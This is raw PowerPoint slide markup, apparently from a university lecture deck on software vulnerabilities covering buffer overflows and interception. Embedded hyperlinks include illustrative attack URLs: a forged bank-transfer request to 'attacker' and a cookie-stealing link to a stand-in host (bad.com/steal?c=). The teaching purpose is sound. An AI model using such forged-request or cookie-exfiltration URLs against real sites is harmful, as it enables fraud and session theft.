                <a:sym typeface="Gill Sans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="1367532" indent="-592832" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="6000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="1841500" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="Gill Sans"/>
                <a:cs typeface="Gill Sans"/>
                <a:sym typeface="Gill Sans"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1746140" indent="-526940" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="5000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buChar char="-"/>
              <a:tabLst>
                <a:tab pos="2235200" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="4200">
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="Gill Sans"/>
                <a:cs typeface="Gill Sans"/>
                <a:sym typeface="Gill Sans"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2190640" indent="-526940" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="5000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buChar char="-"/>
              <a:tabLst>
                <a:tab pos="2679700" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="4200">
                <a:latin typeface="Gill Sans"/>
                <a:ea typeface="Gill Sans"/>
                <a:cs typeface="Gill Sans"/>
                <a:sym typeface="Gill Sans"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2647840" indent="-526940" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="5000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buChar char="-"/>
              <a:tabLst>
                <a:tab pos="3136900" algn="l"/>
              </a:tabLst>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5" name="Shape 175"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19569906" y="12868473"/>
            <a:ext cx="424657" cy="462757"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="53578" tIns="53578" rIns="53578" bIns="53578" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="1066800" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000000">
                    <a:alpha val="50000"/>
                  </a:srgbClr>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2" name="Shape 182"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="184152"/>
            <a:ext cx="16459200" cy="3016249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="91439" rIns="91439" bIns="91439"/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="457200">
              <a:defRPr sz="8800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="Shape 183"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="3200400"/>
            <a:ext cx="16459200" cy="10515600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="91439" rIns="91439" bIns="91439" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="685800" indent="-685800" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:defRPr sz="6400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="1110342" indent="-653142" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="6400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1524000" indent="-609600" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:defRPr sz="6400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2103120" indent="-731520" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="6400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2560320" indent="-731520" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="6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16154400" y="12802234"/>
            <a:ext cx="4267200" cy="551181"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91439" tIns="91439" rIns="91439" bIns="91439" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="4572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C6361F-31DF-994C-9089-BE54C03D95A3}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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904950" y="13010554"/>
            <a:ext cx="556242" cy="513601"/>
          </a:xfrm>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3655806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761999" y="2971800"/>
            <a:ext cx="22859998" cy="9525000"/>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E6803554-7B9A-981B-90FB-579FEFE8EF79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="2249642" y="12948107"/>
            <a:ext cx="7924800" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Amazon Ember" panose="020B0603020204020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Amazon Ember" panose="020B0603020204020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Amazon Ember" panose="020B0603020204020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Amazon Ember" panose="020B0603020204020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Amazon Ember" panose="020B0603020204020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="457200" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Amazon Ember" panose="020B0603020204020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="457200" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Amazon Ember" panose="020B0603020204020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="457200" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Amazon Ember" panose="020B0603020204020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="457200" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Amazon Ember" panose="020B0603020204020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l" defTabSz="2194424" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="x-none" sz="14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2025, Amazon Web Services, Inc. or its affiliates. All rights reserved.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117285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1069217" y="555966"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Shape 57"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069217" y="3134320"/>
            <a:ext cx="15609095" cy="9336129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl2pPr marL="1064106" indent="-619606">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:defRPr sz="4600"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1481666" indent="-592666">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buChar char="-"/>
              <a:defRPr sz="3600"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1926166" indent="-592666">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buChar char="-"/>
              <a:defRPr sz="3600"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2370666" indent="-592666">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buChar char="-"/>
              <a:defRPr sz="3600"/>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xfrm>
            <a:off x="4387453" y="553640"/>
            <a:ext cx="15609094" cy="3036095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Shape 67"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387453" y="3661171"/>
            <a:ext cx="7500938" cy="8840392"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="465364" indent="-465364">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:defRPr sz="3800"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="808264" indent="-465364">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:defRPr sz="3800"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1151164" indent="-465364">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:defRPr sz="3800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1494064" indent="-465364">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:defRPr sz="3800"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1836964" indent="-465364">
              <a:spcBef>
                <a:spcPts val="32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4387453" y="1250156"/>
            <a:ext cx="7500938" cy="11215688"/>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7161609"/>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12504353" y="1250156"/>
            <a:ext cx="7500939" cy="5304235"/>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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>–Johnny Appleseed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="Shape 94"/>
          <p:cNvSpPr>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8000" y="0"/>
            <a:ext cx="18280432"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7" r:id="rId16"/>
    <p:sldLayoutId id="2147483668" r:id="rId17"/>
    <p:sldLayoutId id="2147483669" r:id="rId18"/>
    <p:sldLayoutId id="2147483670" r:id="rId19"/>
  </p:sldLayoutIdLst>
  <p:transition spd="med"/>
  <p:hf hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr marL="0" marR="0" indent="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17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1pPr>
      <a:lvl2pPr marL="10618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2pPr>
      <a:lvl3pPr marL="1506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3pPr>
      <a:lvl4pPr marL="19508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4pPr>
      <a:lvl5pPr marL="2395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5pPr>
      <a:lvl6pPr marL="28398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106.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cs.umd.edu/~mwh/index.html" TargetMode="Externa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www.reddit.com/r/security" TargetMode="External"/><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hyperlink" Target="http://socks.com/" TargetMode="External"/><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mailto:bouncer@pp.com" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:readgood@pp.com" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:dee@pp.com" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:armed@pp.com" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:imagod@pp.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:aneifjask@pp.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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bank.com/transfer.cgi?amt=9999&amp;to=attacker"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bank.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website.com/doStuff.html?sid=81asf98as8eak" TargetMode="Externa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hyperlink" Target="http://bank.com"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hyperlink" Target="http://bank.com"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blog.codeclimate.com/blog/2013/01/10/rails-remote-code-execution-vulnerability-explained/"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hyperlink" Target="http://bank.com"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hyperlink" Target="http://bank.com"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hyperlink" Target="http://bad.com/steal?c="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png"/></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3048000" y="1128848"/>
            <a:ext cx="18288000" cy="4775200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="11200"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3048000" y="6088198"/>
            <a:ext cx="18288000" cy="6294840"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6800" dirty="0"/>
              <a:t>A Data-driven Approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="6400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="6400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="6400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6400" dirty="0"/>
              <a:t>Michael Hicks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>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1591" y="4380176"/>
            <a:ext cx="8301850" cy="5536276"/>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3048000" y="7908452"/>
            <a:ext cx="18288000" cy="3311524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="182880" tIns="9144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0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Software </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="10000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="10000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vulnerabilities</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175643" y="3821492"/>
            <a:ext cx="9113002" cy="6073016"/>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19008436" y="11920856"/>
            <a:ext cx="5205005" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>UPenn CIS 7000-003</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Spring 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349202127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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="461518">
              <a:defRPr sz="8848"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Buffer overflows from 10,000 ft</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319" name="Shape 319"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3828273" y="2799863"/>
            <a:ext cx="16727454" cy="10005043"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="703791" indent="-703791">
              <a:defRPr sz="5700">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Buffer</a:t>
            </a:r>
            <a:r>
              <a:t> =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1158394" lvl="1" indent="-713894">
              <a:defRPr sz="5300"/>
            </a:pPr>
            <a:r>
              <a:t>Block of memory associated with a variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="703791" indent="-703791">
              <a:defRPr sz="5700">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Overflow</a:t>
            </a:r>
            <a:r>
              <a:t> =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1158394" lvl="1" indent="-713894">
              <a:defRPr sz="5300"/>
            </a:pPr>
            <a:r>
              <a:t>Put more into the buffer than it can hold</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="703791" indent="-703791">
              <a:defRPr sz="5700" b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Where does the overflowing data go?</a:t>
            </a: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19">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319">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1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build="p"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4" name="Shape 374"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361297" y="4191502"/>
            <a:ext cx="4595438" cy="3123196"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10463"/>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75" name="Shape 375"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4767453" y="512174"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Interception</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Shape 376"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5840279" y="4336264"/>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Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="Shape 377"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14906248" y="4336264"/>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Service provider</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378" name="Shape 378"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6769697" y="3247958"/>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379" name="Shape 379"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14427265" y="4191502"/>
            <a:ext cx="4595438" cy="3123196"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10463"/>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80" name="Shape 380"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14441523" y="3247958"/>
            <a:ext cx="456692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Remote service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="381" name="Shape 381"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9419239" y="5675717"/>
            <a:ext cx="5545523" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="88900">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382" name="Shape 382"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10818646" y="4445579"/>
            <a:ext cx="174371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CALL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="383" name="Shape 383"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12572001" y="4445579"/>
            <a:ext cx="103822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chemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>foo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
